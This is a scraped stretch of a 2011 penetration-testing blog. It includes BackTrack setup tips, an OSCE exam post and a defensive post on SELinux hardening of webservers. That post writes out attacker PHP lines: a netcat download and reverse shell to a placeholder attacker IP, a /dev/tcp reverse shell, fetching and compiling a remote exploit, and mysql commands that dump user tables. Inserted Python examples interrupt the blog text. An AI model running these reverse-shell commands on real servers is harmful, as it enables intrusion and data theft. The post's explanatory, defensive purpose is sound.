<span class="Apple-style-span" style="font-family: 'Courier New',Courier,monospace;">"/foo.php:user=^USER^&pass=^PASS^:S=success:C=/page/cookie:H=X-Foo: Foo"</span><br />
<div><span class="Apple-style-span" style="font-family: 'Courier New',Courier,monospace;"><br />
</span></div>All in all, this is a pretty straightforward and very effective tool, as long as you understand how the form works, and what parameters are required, before you start the attack.</form>Benhttp://www.blogger.com/profile/12120787183871800863noreply@blogger.com350tag:blogger.com,1999:blog-6428740549041097500.post-84074331288254129742011-08-21T21:46:00.002+01:002011-08-24T09:45:49.919+01:00A few other tips for Backtrack 5 graphics drivers issues, and software installsHaving rebuilt my main BT5 laptop again today, here are some tips I can share for anyone else who has the same needs (and hopefully this will make it quicker for me if I want to rebuild the same setup again).<br />
<br />
I already made some suggestions for my Desktop system (when I installed that with Backtrack 5) but that covered Nvidia graphics drivers, and other software installs:<br />
<br />
<a href="http://insidetrust.blogspot.com/2011/05/overcoming-problems-installing.html">http://insidetrust.blogspot.com/2011/05/overcoming-problems-installing.html</a><br />
<br />
I'm currently using BT5 KDE 64-bit on a Dell Inspiron 17R 7010 - This has a nice big screen, which is useful for virtual hosts etc...<br />
<br />
Anyway, the reason for the rebuild was that initially a kernel update (2.6.39.4) stopped various packages from working. So I thought I would try out BT5 R1 KDE 64-bit, but then after an abortive install of R1, I've gone back to my previous stable setup (I haven't got to the bottom of the kernel and R1 issues yet, maybe more on that next time).<br />
<br />
So, after a standard install of BT5...<br />
<br />
<br />
<b>Intel graphics drivers</b><br />
<br />
My laptop has Intel graphics, and initially "startx" would result in a black screen and a lockup with no errors. I got a solution a while back from some of the folks on the #backtrack-linux IRC channel (I couldn't remember it exactly, but I figured it out for myself this time; thanks to a_landim_xhkl and _ope_ for the original feedback).<br />
<br />
A basic way to get the Intel graphics driver working is to reconfigure /boot/grub/grub.cfg , but this needs to be done via the template files and grub config builder.<br />
<br />
You need to edit the file /etc/default/grub and add the Intel option (back it up first):<br />
<br />
<div style="font-family: 'Courier New',Courier,monospace;">cp /etc/default/grub /etc/default/grub.old</div><br />
... then edit the following line adding the options in red:<br />
<br />
<span style="font-family: 'Courier New',Courier,monospace;">GRUB_CMDLINE_LINUX="<span style="color: #cc0000;">text splash vga=791 i915.modeset=1</span>"</span><br />
<br />
Then rebuild the grub config and reboot:<br />
<br />
<div style="font-family: 'Courier New',Courier,monospace;">grub-mkconfig -o /boot/grub/grub.cfg</div><div style="font-family: 'Courier New',Courier,monospace;">init 6</div><br />
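The edit to /etc/default/grub is easy to get wrong by hand (doubled options, or the GRUB_CMDLINE_LINUX_DEFAULT line edited instead of GRUB_CMDLINE_LINUX). The following Python is an added example (not from the original post) that makes the same change programmatically: it merges kernel options into the GRUB_CMDLINE_LINUX line of a grub defaults file, leaves options already present alone, and replaces an option whose key already exists. The sample file content is constructed; the update_grub_defaults helper copies the file to grub.old first, as the cp line above does, and grub-mkconfig still has to be run afterwards.

```python
import re
import shutil

# The GRUB_CMDLINE_LINUX="..." line of /etc/default/grub. GRUB_CMDLINE_LINUX_DEFAULT
# is deliberately not matched, because the '=' must follow the name immediately.
CMDLINE_RE = re.compile(r'^(GRUB_CMDLINE_LINUX=)"(?P<opts>[^"]*)"[ \t]*$', re.MULTILINE)

# Constructed /etc/default/grub excerpt (not the post's own file).
SAMPLE_GRUB_DEFAULTS = """\
GRUB_DEFAULT=0
GRUB_TIMEOUT=10
GRUB_CMDLINE_LINUX="text splash vga=791"
GRUB_CMDLINE_LINUX_DEFAULT=""
"""


def add_kernel_options(grub_defaults, new_options):
    """Return grub_defaults with every option in new_options on the GRUB_CMDLINE_LINUX line.

    An option already present verbatim is left where it is (so re-running is a
    no-op); a key=value option replaces an existing entry with the same key, so
    i915.modeset=1 takes over from i915.modeset=0 instead of sitting beside it.
    """
    m = CMDLINE_RE.search(grub_defaults)
    if m is None:
        raise ValueError("no GRUB_CMDLINE_LINUX line found")
    current = m.group("opts").split()
    for opt in new_options:
        if opt in current:
            continue
        key = opt.split("=", 1)[0]
        current = [o for o in current if o.split("=", 1)[0] != key]
        current.append(opt)
    new_line = '%s"%s"' % (m.group(1), " ".join(current))
    return grub_defaults[:m.start()] + new_line + grub_defaults[m.end():]


def update_grub_defaults(path="/etc/default/grub", options=("i915.modeset=1",)):
    """Back the file up to path + '.old' (the post's cp step) and rewrite it in place.

    Rebuilding /boot/grub/grub.cfg with grub-mkconfig is still a separate step.
    """
    shutil.copy2(path, path + ".old")
    with open(path) as fh:
        text = fh.read()
    with open(path, "w") as fh:
        fh.write(add_kernel_options(text, list(options)))


if __name__ == "__main__":
    print(add_kernel_options(SAMPLE_GRUB_DEFAULTS, ["i915.modeset=1"]))
```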
<br />
<b>The BT5 KDE 64-bit gotcha</b><br />
<br />
We're not out of the woods yet for KDE, but this one has been mentioned over and over in various places - this is the known issue where KDE crashes out after the first Chinese symbol on the red starting screen.<br />
<br />
If you are using BT5 KDE 64-bit you will likely need to do the following before you can run startx<br />
<br />
<span style="font-family: 'Courier New',Courier,monospace;">rm /root/.kde/cache-root/icon-cache.kcache</span><br />
<span style="font-family: 'Courier New',Courier,monospace;">rm /root/.kde/cache-root/plasma_theme_Volatile.kcache</span><br />
<span style="font-family: 'Courier New',Courier,monospace;">rm /root/.kde/cache-bt/icon-cache.kcache</span><br />
<span style="font-family: 'Courier New',Courier,monospace;">rm /root/.kde/cache-bt/plasma_theme_Volatile.kcache</span><br />
<span style="font-family: 'Courier New',Courier,monospace;">rm -rf /var/tmp/kdecache-root</span><br />
<br />
After that KDE starts fine, now to install some extra stuff...<br />
<br />
<br />
<b>Installing and running VMware Player</b><br />
<br />
Download VMware Player<br />
<br />
<a href="http://downloads.vmware.com/d/details/player_314/ZGp0YnR0KnRiZGh0QA==">http://downloads.vmware.com/d/details/player_314/ZGp0YnR0KnRiZGh0QA==</a> <br />
<br />
Then you need the kernel sources in order to install and run VMware Player. Run the following (and go do something else while it does its thing):<br />
<br />
<span style="font-family: 'Courier New',Courier,monospace;">prepare-kernel-sources</span><br />
<br />
Then run the install, and this should work fine<br />
<br />
<span style="font-family: 'Courier New',Courier,monospace;">./VMware-Player-3.1.4-385536.x86_64.bundle</span><br />
<br />
<br />
<b>Installing and running Google Chrome</b><br />
<br />
Download the <a href="http://www.google.com/chrome/eula.html?hl=en-GB&platform=linux_ubuntu_x86_64">latest 64 bit Google Chrome build</a> and then do:<br />
<br />
<div style="font-family: 'Courier New',Courier,monospace;">dpkg -i ./google-chrome-stable_current_amd64.deb</div><br />
You may get a complaint about running this as root, so either create an account for browsing, or start the browser with the following command<br />
<br />
<span class="Apple-style-span" style="font-family: 'Courier New',Courier,monospace;">/opt/google/chrome/google-chrome %U --user-data-dir</span><br />
<br />
(I've seen some ridiculously complex suggested ways of doing this, such as hex-editing binaries, the above seems like the easiest by far)<br />
<br />
You can either run this from the command line, or easier still, change the shortcut command to the above. This works very well as of Chrome version 13.0.782.215.<br />
<br />
<br />
Benhttp://www.blogger.com/profile/12120787183871800863noreply@blogger.com286tag:blogger.com,1999:blog-6428740549041097500.post-24747374798589240562011-07-05T12:07:00.006+01:002011-07-10T17:10:46.944+01:00I've passed the OSCE (Offensive Security Certified Expert) examI didn't blog much last month, as I have been researching and studying hard.<br />
<br />
Anyway, I am pleased to announce that I have passed the Offensive Security Certified Expert exam (<a href="http://www.offensive-security.com/online-information-security-training/cracking-the-perimeter/">OSCE</a>), which is the certification for the "Cracking The Perimeter" course I took earlier this year.<br />
<br />
This is a monster 48 hour exam (+24 hours for documentation). It covers techniques such as advanced web attacks, vulnerability discovery, exploit development, custom payload creation, detection avoidance, and advanced network attacks.<br />
<br />
It's pretty specialized stuff (you have to pass a hacking challenge to even register for the course, and trust me, if you can't pass that challenge, you are definitely not ready ;o)<br />
<br />
<div class="separator" style="clear: both; text-align: center;"><a href="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEiDFI7vo3i8V1bwew3XoycD6CDqwVo4zXltrwb3nxbGgbMNVB1YhYNzuRb5rKyXo2IFG31LgDv1ZBm3UWAXLq99P42YXsWaqFVkTZE7NZhYgVaZyI0lQuVA_K8o14EJGjanj-t4fLdTr4A/s1600/ctp.png" imageanchor="1" style="margin-left: 1em; margin-right: 1em;"><img border="0" height="216" src="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEiDFI7vo3i8V1bwew3XoycD6CDqwVo4zXltrwb3nxbGgbMNVB1YhYNzuRb5rKyXo2IFG31LgDv1ZBm3UWAXLq99P42YXsWaqFVkTZE7NZhYgVaZyI0lQuVA_K8o14EJGjanj-t4fLdTr4A/s400/ctp.png" width="400" /></a></div><br />
The CTP course was great, though I would say that anyone attempting the OSCE certification needs to do a lot of extra practice and study, to get to the level where they can creatively and confidently exploit various different types of systems and applications (especially some exploit-development research), before they take the exam.<br />
<br />
It's definitely one of the most challenging certifications I have done (I have done quite a few recently) - and I feel that my skill levels have shot up as a result.<br />
<br />
My next plans are<br />
1) Continuing my research project<br />
2) Taking the GWAPT exam<br />
3) Crest CHECK Certification (which seems to be very important for pen-testing jobs in the UK)Benhttp://www.blogger.com/profile/12120787183871800863noreply@blogger.com26tag:blogger.com,1999:blog-6428740549041097500.post-25479131096528977392011-06-24T13:43:00.036+01:002011-06-29T09:14:40.280+01:00Webserver defense-in-depth - Hackers vs SELinux and restricted accountsWeb attacks are often a first phase of an attack against internet-facing Linux servers. However, these days unless a system is very badly configured, internet-facing services are usually run with a service account that has very limited rights, such as "apache". <br />
<br />
This has a huge security benefit as part of a defense-in-depth policy. Having this limited service account means that, even if vulnerabilities are found in the website, attackers can be prevented from escalating privileges and gaining complete control of the system.<br />
<br />
If you are currently running internet-facing services as root you should REALLY look at this issue and do something about it, because in this situation a single common website vulnerability could lead an attacker quickly to full system compromise. Game over.<br />
<br />
Having said this, let's look at some of the other components for defense-in-depth of web-servers.<br />
<br />
<span style="color: #cc0000;">This information is intended for educational purposes. It is important to understand these issues if you design or maintain systems, but please only test in your own test environment.</span><br />
<br />
<b>Let's work with an example</b><br />
<br />
Say a company is running a web-server that contains website vulnerabilities that they are unaware of.<br />
<br />
However, on the plus side, say their web-server is running as "apache", and their platform is the latest RedHat Linux 5.6 (with up-to-date patches)<br />
<br />
If an attacker could use the website vulnerabilities to introduce server-side code, they may aim to get a reverse-shell with some PHP code like this example:<br />
<br />
<div style="font-family: 'Courier New',Courier,monospace;">echo shell_exec('wget http://-attackersip-/nc -O /tmp/nc');</div><div style="font-family: 'Courier New',Courier,monospace;">echo shell_exec('chmod +x /tmp/nc');</div><div style="font-family: 'Courier New',Courier,monospace;">echo shell_exec('/tmp/nc -attackersip- -attackersport- -e /bin/bash');</div><br />
<br />
If they can write this code to somewhere and run it from the web-server this would effectively upload the netcat tool from the attackers system to the web-server, and use it to connect back to the attacker giving them a command shell in the context of the web-server account. (good job the web-server was not running as root!)<br />
<br />
The attacker would get a reverse shell, as apache, which they would then need to find a way to escalate (either by a kernel exploit, or some other local privilege escalation exploit).<br />
<br />
This may take them some time, and they may be detected whilst they try to do this.<br />
<br />
(It's a maybe, but if they manage it they can then cover their tracks.)<br />
<br />
<br />
<b>A more secure platform - with SELinux</b><br />
<br />
OK, so let's say that the web-server is running as "apache", the system is RedHat Linux 5.6 (with up-to-date patches), and SELinux is enabled with the default security configuration.<br />
<br />
SELinux can prevent running of files and services. This can be pretty confusing for an attacker who is not familiar with SELinux because although they may get some limited control, most of their commands will fail for no apparent reason.<br />
<br />
This can stop the previous netcat shell example from working, because netcat is trying to make an outbound connection to the attacker as "apache".<br />
<br />
<br />
<b>Working around SELinux</b><br />
<br />
To work around the shell issue above, an attacker can use a netcat-less shell technique to get a command shell (again, this is PHP):<br />
<br />
<span style="font-family: 'Courier New',Courier,monospace;">echo shell_exec('cd /tmp && exec /bin/bash 0&lt;/dev/tcp/-attackersip-/-attackersport- 1>&0 2>&0 &');</span><br />
<br />
This shell technique has several advantages:<br />
<br />
<ul><li>It provides a reasonably usable command shell</li>
<li>It does not require any code to be uploaded to the victim server</li>
<li>It bypasses SELinux in most situations</li>
<li>It works on most versions of Linux, and even Mac OS X or Solaris!</li>
<ul><li><i>The shell, file ("0"), and directory may need to be changed depending on availability (the directory and file "0" must be writable).</i></li>
</ul></ul><br />
<b>More SELinux problems for the attacker</b><br />
<br />
So, let's say that the attacker manages to get a reverse shell as the "apache" user. All is not lost, because this shell is very limited: firstly by the rights of "apache", and secondly by SELinux.<br />
<br />
The attacker is limited in the type of commands they can run, and in what they can see. They are in a jail, and they are trying to dig their way out...<br />
<br />
<br />
<b>What can the attacker do?</b><br />
<br />
If some commands are possible for the attacker, they will try to enumerate their way around the operating system, looking for holes.<br />
<br />
<br />
Oddly, on RedHat (or CentOS) as of 4.8 or 5.6, even though "/bin/ls" is blocked by SELinux by default, "/usr/bin/dir" is not.<br />
<br />
So whilst an attacker can't do:<br />
<br />
<span style="font-family: 'Courier New',Courier,monospace;">/bin/ls -al /tmp</span><br />
<br />
They can do:<br />
<br />
<span style="font-family: 'Courier New',Courier,monospace;">/usr/bin/dir -al /tmp</span><br />
<br />
However, "dir" is more limited than "ls", and does not give the file ownership and rights for files that "apache" does not own. It can still enable an attacker to enumerate files and directories (rather than fumbling their way around in the dark), so the attacker can continue to enumerate the system.<br />
<br />
Also, with SELinux, both "ls" and "dir" support the -Z option, which shows the SELinux context for files and directories. (Note, however, that each of the lines with a "?" will trigger an SELinux alert.)<br />
<br />
<div style="font-family: 'Courier New',Courier,monospace;">dir -alZ<br />
drwxrwxrwt root root system_u:object_r:tmp_t:s0 .<br />
drwxr-xr-x root root system_u:object_r:root_t:s0 ..<br />
?--------- ? ? .ICE-unix<br />
?--------- ? ? .X0-lock<br />
?--------- ? ? .X11-unix<br />
?--------- ? ? .font-unix<br />
?--------- ? ? .gdm_socket<br />
?--------- ? ? VMwareDnD<br />
drwxr-xr-x apache apache root:object_r:tmp_t:s0 enlightenment<br />
drwx------ centos centos user_u:object_r:tmp_t:s0 gconfd-centos<br />
drwx------ root root root:object_r:tmp_t:s0 gconfd-root<br />
?--------- ? ? ks-script-6qJjjE<br />
?--------- ? ? ks-script-6qJjjE.log<br />
?--------- ? ? libno_ex.so.1.0<br />
?--------- ? ? mapping-centos<br />
?--------- ? ? mapping-root<br />
-rwxr-xr-x apache apache root:object_r:httpd_tmp_t:s0 nc<br />
drwx------ centos centos user_u:object_r:tmp_t:s0 vmware-centos<br />
?--------- ? ? vmware-root</div><br />
<br />
The attacker can confirm whether SELinux is enabled by running:<br />
<br />
<div style="font-family: 'Courier New',Courier,monospace;">sestatus -v<br />
<br />
SELinux status: enabled<br />
SELinuxfs mount: /selinux<br />
Current mode: unknown (Permission denied)<br />
Mode from config file: error (Permission denied)<br />
Policy version: unknown (Permission denied)<br />
Policy from config file: targeted<br />
<br />
Process contexts:<br />
Current context: system_u:system_r:httpd_t:s0<br />
Init context: unknown (Permission denied)<br />
<br />
File contexts:<br />
Controlling term: unknown (Bad address)<br />
/etc/passwd system_u:object_r:etc_t:s0<br />
/bin/bash system_u:object_r:shell_exec_t:s0<br />
/bin/sh system_u:object_r:bin_t:s0 -> system_u:object_r:shell_exec_t:s0<br />
/lib/libc.so.6 system_u:object_r:lib_t:s0 -> system_u:object_r:lib_t:s0<br />
/lib/ld-linux.so.2 system_u:object_r:lib_t:s0 -> system_u:object_r:ld_so_t:s0</div><br />
<br />
There are often lots of anomalies in SELinux policies, which can help an attacker get a bigger foothold on a system.<br />
<br />
On RedHat 5.6, for example, by default the attacker can also use several other useful commands, such as:<br />
<br />
<div style="font-family: 'Courier New',Courier,monospace;">uname -a<br />
Linux localhost.localdomain 2.6.18-238.12.1.el5 #1 SMP Tue May 31 13:23:01 EDT 2011 i686 athlon i386 GNU/Linux</div><br />
<br />
...in order to enumerate the system version and kernel, before attempting kernel exploits.<br />
<br />
The attacker can use "wget", or "echo", and "chmod" to write executable files into a directory such as "/tmp/".<br />
<br />
<br />
Also, in my tests I could use gcc to compile source code for exploits on the system. For example:<br />
<br />
<div style="font-family: 'Courier New',Courier,monospace;">cd /tmp<br />
wget http://-attackersip-/exploit.c<br />
gcc exploit.c -o exploit<br />
./exploit</div><br />
<br />
Unchecked, it is likely that a highly skilled attacker will eventually find a privilege escalation exploit that works.<br />
<br />
However, there are lots of commands that will fail because of SELinux, and these failures get logged.<br />
<br />
<br />
<b>Detecting the attack with logging</b><br />
<br />
Meanwhile, the attacker's failed command attempts are being logged by SELinux, and if savvy administrators have alerting configured, or regularly check all their logs, the hacking attempts can be detected.<br />
<br />
In reality, system administrators are very busy, so these are big ifs (unless fully configured SIEM systems are deployed).<br />
<br />
For SELinux logging, if the audit daemon is running (as it is by default on RedHat), then these messages will be in "/var/log/audit/audit.log" (otherwise "/var/log/messages"); both of these should only be accessible to privileged users.<br />
<br />
To manually search this log for failures in the context of the web-server, you could do something like:<br />
<br />
<span style="font-family: 'Courier New',Courier,monospace;">cat /var/log/audit/audit.log | grep "type=AVC" | cut -d":" -f4</span><br />
<br />
<span style="font-family: 'Courier New',Courier,monospace;"><span style="color: #cc0000;">denied</span> { getattr } for pid=20137 comm="bash" path="<span style="color: #cc0000;">/bin/rpm</span>" dev=sda2 ino=351687 scontext=system_u</span><br />
<br />
<br />
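The cut -f4 one-liner above is fine for a quick look; for repeated triage it helps to parse the AVC records properly, so that denials from the web-server's domain can be separated from the background noise of other daemons and counted. The following Python is an added example (not from the original post) that reads audit.log records, keeps only denials whose source context is the web-server domain httpd_t, and tallies what was attempted. The sample records are constructed to resemble the RHEL 5 audit format, including the /bin/rpm denial shown above, with made-up pids, inode numbers and timestamps.

```python
import re
from collections import Counter

# One AVC record as written by the audit daemon. The fields after "for" are
# key=value pairs; quoted values may contain spaces.
AVC_RE = re.compile(
    r'^type=AVC msg=audit\((?P<time>\d+\.\d+):(?P<serial>\d+)\): avc:\s+'
    r'(?P<decision>denied|granted)\s+\{ (?P<perms>[^}]+) \} for\s+(?P<fields>.*)$'
)
FIELD_RE = re.compile(r'(\w+)=("[^"]*"|\S+)')

# Constructed sample records (not from the original post; pids, inodes and
# timestamps are made up). Three denials come from the web-server's httpd_t
# domain, one from an unrelated daemon, and one SYSCALL record is ignored.
SAMPLE_AUDIT_LOG = """\
type=AVC msg=audit(1308912345.123:4567): avc:  denied  { getattr } for  pid=20137 comm="bash" path="/bin/rpm" dev=sda2 ino=351687 scontext=system_u:system_r:httpd_t:s0 tcontext=system_u:object_r:rpm_exec_t:s0 tclass=file
type=SYSCALL msg=audit(1308912345.123:4567): arch=40000003 syscall=195 success=no exit=-13 pid=20137 uid=48 comm="bash" exe="/bin/bash" subj=system_u:system_r:httpd_t:s0
type=AVC msg=audit(1308912346.001:4568): avc:  denied  { execute } for  pid=20137 comm="bash" name="ls" dev=sda2 ino=351201 scontext=system_u:system_r:httpd_t:s0 tcontext=system_u:object_r:bin_t:s0 tclass=file
type=AVC msg=audit(1308912350.400:4569): avc:  denied  { name_connect } for  pid=20150 comm="nc" dest=4444 scontext=system_u:system_r:httpd_t:s0 tcontext=system_u:object_r:port_t:s0 tclass=tcp_socket
type=AVC msg=audit(1308912351.000:4570): avc:  denied  { read } for  pid=2210 comm="cupsd" name="printers.conf" dev=sda2 ino=98111 scontext=system_u:system_r:cupsd_t:s0 tcontext=system_u:object_r:cupsd_etc_t:s0 tclass=file
"""


def parse_avc(line):
    """Parse one AVC record into a dict, or return None for any other record type."""
    m = AVC_RE.match(line.strip())
    if m is None:
        return None
    rec = {
        "time": float(m.group("time")),
        "decision": m.group("decision"),
        "perms": m.group("perms").split(),
    }
    for key, value in FIELD_RE.findall(m.group("fields")):
        rec[key] = value.strip('"')
    return rec


def source_domain(rec):
    """The type part of scontext, e.g. httpd_t from system_u:system_r:httpd_t:s0."""
    parts = rec.get("scontext", "").split(":")
    return parts[2] if len(parts) > 2 else ""


def denials_for_domain(log_text, domain="httpd_t"):
    """All denied AVC records whose source process runs in `domain`."""
    return [
        rec for rec in map(parse_avc, log_text.splitlines())
        if rec is not None and rec["decision"] == "denied" and source_domain(rec) == domain
    ]


def summarise(denials):
    """Count (command, permission, target) triples for a quick triage list."""
    counts = Counter()
    for rec in denials:
        target = rec.get("path") or rec.get("name") or rec.get("dest") or "?"
        counts[(rec.get("comm", "?"), " ".join(rec["perms"]), target)] += 1
    return counts


if __name__ == "__main__":
    for (comm, perms, target), n in summarise(denials_for_domain(SAMPLE_AUDIT_LOG)).most_common():
        print("%3d  %-8s %-14s %s" % (n, comm, perms, target))
```

The name_connect denial is the interesting one for this post: it is exactly what an outbound netcat shell running as "apache" leaves behind, and a web-server process that suddenly wants to execute ls or stat rpm is not normal web-server behaviour either.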
<br />
It is possible for an attacker to work away without triggering any SELinux alerts, but it is very difficult, and ideally an attacker needs a replica system, with a very similar policy, to practise on.<br />
<br />
<br />
It's a bit like playing the game Operation... one false move and bzzzt... the alarm goes off.<br />
<br />
<br />
<div class="separator" style="clear: both; text-align: center;"><a href="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEhC9TI10yHSi_Ohu9BsZnT83XZ40JW6NXsmKZ1zAh6YXHhQPQyE6f4QZ2VKv_ht954J5cHcbCilIeIll2ksm55wJR8uDdBhTFBV05eVwBowGyrq6H2C5pT2Dg7pDsnga9VrEcn_2FWg964/s1600/opperation.jpg" imageanchor="1" style="margin-left: 1em; margin-right: 1em;"><img border="0" height="240" src="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEhC9TI10yHSi_Ohu9BsZnT83XZ40JW6NXsmKZ1zAh6YXHhQPQyE6f4QZ2VKv_ht954J5cHcbCilIeIll2ksm55wJR8uDdBhTFBV05eVwBowGyrq6H2C5pT2Dg7pDsnga9VrEcn_2FWg964/s320/opperation.jpg" width="320" /></a></div><br />
<b>More subtle attacks</b><br />
<br />
However, even if direct privilege escalation is not possible, with a remote shell as "apache" an attacker can do lots of things in the context of the web-server. Depending on how the website and databases are configured, other attacks may be possible (even if the server is not fully compromised).<br />
<br />
Examples of this could include active-session hijacking using server-side tokens in "/var/lib/php/session/" or "/tmp". This may allow an attacker to gain enough information to log in to the website as active users, and attack their accounts.<br />
<br />
This can often be done simply by using an attacking proxy (such as Burp) to add the gained session token to a browser session. Of course, this can also be scripted to enable fast attacks against any active users.<br />
<br />
<br />
<br />
<b>Attacking via the database</b><br />
<br />
Alternatively, running in the context of the web-server it is always possible to view other sensitive information, such as server-side code (PHP for example) and steal login details for the database.<br />
<br />
The attacker could then proceed to attack the database, to steal information, or to write and read files on the filesystem as the database user.<br />
<br />
If an attacker could get login details for a MySQL database from server-side code, they could execute SQL queries such as:<br />
<br />
<span style="font-family: 'Courier New',Courier,monospace;">mysql --user=databaseuser --password='password' websitedb -e "select * from users;" > output.txt</span><br />
<br />
Alternatively, they could read or write files as the mysql user, which may help in their escalation process.<br />
<br />
<span style="font-family: 'Courier New',Courier,monospace;">mysql --user=databaseuser --password='password' websitedb -e "SELECT 'whatever data you like' INTO OUTFILE '/tmp/test';"</span><br />
<br />
<br />
If the database is running as "root", then you can probably see how this could lead to a full system compromise. (The database could be on another system, in which case it is this secondary system that could be compromised.)<br />
<br />
SELinux can't prevent access to the database for "apache", because the website user needs to interact with it in order for the site to work, but maybe some of these other commands can be locked down with a tougher SELinux policy.<br />
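Whether the INTO OUTFILE step above turns stolen web-application credentials into files on the filesystem depends on three things on the database side: whether mysqld itself has been configured to run as root, whether secure_file_priv confines where files can be written or read, and whether the website's database account holds the FILE privilege (directly, or through ALL PRIVILEGES). The following Python is an added example (not from the original post) that checks a my.cnf excerpt and the output of SHOW GRANTS for those three conditions, with a constructed weak configuration beside a hardened one. The account name databaseuser is taken from the post; the file paths and grant lines are constructed.

```python
import re

# "GRANT <privs> ON <scope> TO 'user'@'host' ..." as printed by SHOW GRANTS.
GRANT_RE = re.compile(
    r"^GRANT (?P<privs>.+?) ON (?P<scope>\S+) TO (?P<user>'[^']*'@'[^']*')",
    re.IGNORECASE,
)

# Constructed configurations (not the post's server). The weak one has every
# property the post warns about; the hardened one is what the recommendations
# at the end of the post amount to on the database side.
WEAK_MY_CNF = """\
[mysqld]
user=root
datadir=/var/lib/mysql
"""
WEAK_GRANTS = [
    "GRANT ALL PRIVILEGES ON *.* TO 'databaseuser'@'localhost'",
]

HARDENED_MY_CNF = """\
[mysqld]
user=mysql
datadir=/var/lib/mysql
secure-file-priv=/var/lib/mysql-files
"""
HARDENED_GRANTS = [
    "GRANT USAGE ON *.* TO 'databaseuser'@'localhost'",
    "GRANT SELECT, INSERT, UPDATE, DELETE ON `websitedb`.* TO 'databaseuser'@'localhost'",
]


def parse_my_cnf(text):
    """Minimal my.cnf reader: {section: {key: value}}; '-' and '_' in keys are unified."""
    sections, current = {}, None
    for raw in text.splitlines():
        line = raw.split("#", 1)[0].strip()
        if not line:
            continue
        if line.startswith("[") and line.endswith("]"):
            current = line[1:-1].lower()
            sections.setdefault(current, {})
            continue
        if current is None:
            continue
        key, _, value = line.partition("=")
        sections[current][key.strip().lower().replace("-", "_")] = value.strip().strip('"')
    return sections


def file_write_findings(my_cnf_text, grant_lines):
    """List the conditions that let a stolen web-app DB login reach the filesystem."""
    findings = []
    mysqld = parse_my_cnf(my_cnf_text).get("mysqld", {})
    # mysqld only runs as root when explicitly told to; files it writes are then root-owned.
    if mysqld.get("user", "").lower() == "root":
        findings.append("mysqld is configured to run as root: files written via INTO OUTFILE are owned by root")
    # An unset or empty secure_file_priv leaves INTO OUTFILE / LOAD_FILE free to use any
    # directory the mysqld user can write or read; a directory value confines them to it.
    if not mysqld.get("secure_file_priv"):
        findings.append("secure_file_priv is unset or empty: INTO OUTFILE / LOAD_FILE are not confined to a directory")
    for line in grant_lines:
        m = GRANT_RE.match(line.strip())
        if m is None:
            continue
        privs = {p.strip().upper() for p in m.group("privs").split(",")}
        if "FILE" in privs or "ALL PRIVILEGES" in privs or "ALL" in privs:
            findings.append("%s holds FILE (directly or via ALL): INTO OUTFILE and LOAD_FILE are available" % m.group("user"))
    return findings


if __name__ == "__main__":
    for label, cnf, grants in (("weak", WEAK_MY_CNF, WEAK_GRANTS), ("hardened", HARDENED_MY_CNF, HARDENED_GRANTS)):
        print(label, file_write_findings(cnf, grants) or ["no findings"])
```

The last check is the one that matters most for the post's scenario: a website account that only needs SELECT, INSERT, UPDATE and DELETE on its own schema cannot run INTO OUTFILE at all, whatever the web-server user can or cannot do.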
<br />
<br />
<b>What can you do about these issues? Add more security...</b><br />
<br />
1) Identify and fix the website vulnerabilities.<br />
<br />
This could be a difficult and lengthy process, which requires a high level of skill, especially for custom-built websites, but it should be done.<br />
<br />
2) Limit outbound connections from the web-server on a firewall<br />
<br />
For example, the web-server could be allowed outbound access only on port 80, and only via a web proxy that has some content security.<br />
<br />
3) Checking logs and reacting to security incidents<br />
<br />
This should be done regularly, but is often omitted. Some sysadmins are unaware of the issues.<br />
<br />
4) Run the database, the web-server, and any other services with restricted service accounts, such as "apache", "mysql", "ftp".<br />
<br />
Never use root; this makes a hacker's life too easy.<br />
<br />
5) Deploy a tougher SELinux policy to block more commands for the web-server and database users<br />
<br />
This can be difficult to do, and I would not suggest doing it to a production server without thorough testing beforehand. SELinux is complex, and you can easily mess up a live system with a simple oversight.<br />
<br />
6) Have a look in your "/tmp" directories every now and then<br />
<br />
If hackers are messy, they may well have left something behind.<br />
<br />
7) Run a host-based or network-based IDS<br />
<br />
Deploying an Intrusion Detection System (like Snort, for example) can alert you to common signatures of hacker activity.Benhttp://www.blogger.com/profile/12120787183871800863noreply@blogger.com9tag:blogger.com,1999:blog-6428740549041097500.post-43652944647864656312011-06-15T17:51:00.003+01:002011-06-16T10:32:25.364+01:00Scapy packet forging, and writing multi-threaded networking scripts with PythonJust a quick post on a couple of great videos I found.<br />
<br />
If you are interested in using python for exploit-development of network services this may be helpful.<br />
<br />
This is the start of what looks like a great series of videos from Rene Schallner and Patrick Schallner, on Python skills for hacking.<br />
<br />
It looks like they will be covering useful techniques in a good deal of depth (good for me anyway), and I think they will be releasing more videos over the next few weeks on <a href="http://securitytube.net/">securitytube.net</a><br />
<br />
<br />
<br />
<br />
<b>First video</b><br />
<br />
This video covers the basics of running scapy, and basic python scripts to emulate a server and client.<br />
<br />
<iframe frameborder="0" height="225" src="http://player.vimeo.com/video/24570637" width="400"></iframe><br />
<br />
<br />
<br />
<b>Second video</b><br />
<br />
After the basics in video one, this second video gets much more in-depth; implementing multi-threaded clients and servers, and using scapy to capture, edit and replay packets to replicate malicious traffic.<br />
<br />
<iframe frameborder="0" height="225" src="http://player.vimeo.com/video/24763819" width="400"></iframe><br />
<br />
It looks like there will be several more of these videos to come.<br />
(Keep up the good work Rene and Patrick. Your videos are great so far!)<br />
<br />
<br />
<b>Scapy documentation</b><br />
<br />
Additionally, there is a great set of online documentation of scapy at the following location:<br />
<a href="http://www.secdev.org/projects/scapy/doc/index.html">http://www.secdev.org/projects/scapy/doc/index.html</a>Benhttp://www.blogger.com/profile/12120787183871800863noreply@blogger.com6tag:blogger.com,1999:blog-6428740549041097500.post-88714553169023000282011-05-23T15:08:00.006+01:002011-06-13T14:01:41.676+01:00Finding alphanumeric jump addresses for buffer-overflow exploit developmentBuffer-overflow exploit-development can sometimes be challenging for services which use protocols that have restricted character-sets.<br />
<br />
In a previous blog on <a href="http://insidetrust.blogspot.com/2011/02/using-backtrack-to-spot-bad-characters.html">bad-characters</a>, I talked about ways to encode payloads so that problem special characters can be avoided in exploit payloads.<br />
<br />
Whilst that is fine for "introducing" code to the target system, an attacker also needs to hijack code execution to run the malicious payload. This is done by controlling EIP by placing a jump address within the buffer. This jump address precisely overwrites EIP (either directly as part of the function epilogue, or via a Structured Exception Handler) to redirect code execution to the malicious payload.<br />
<br />
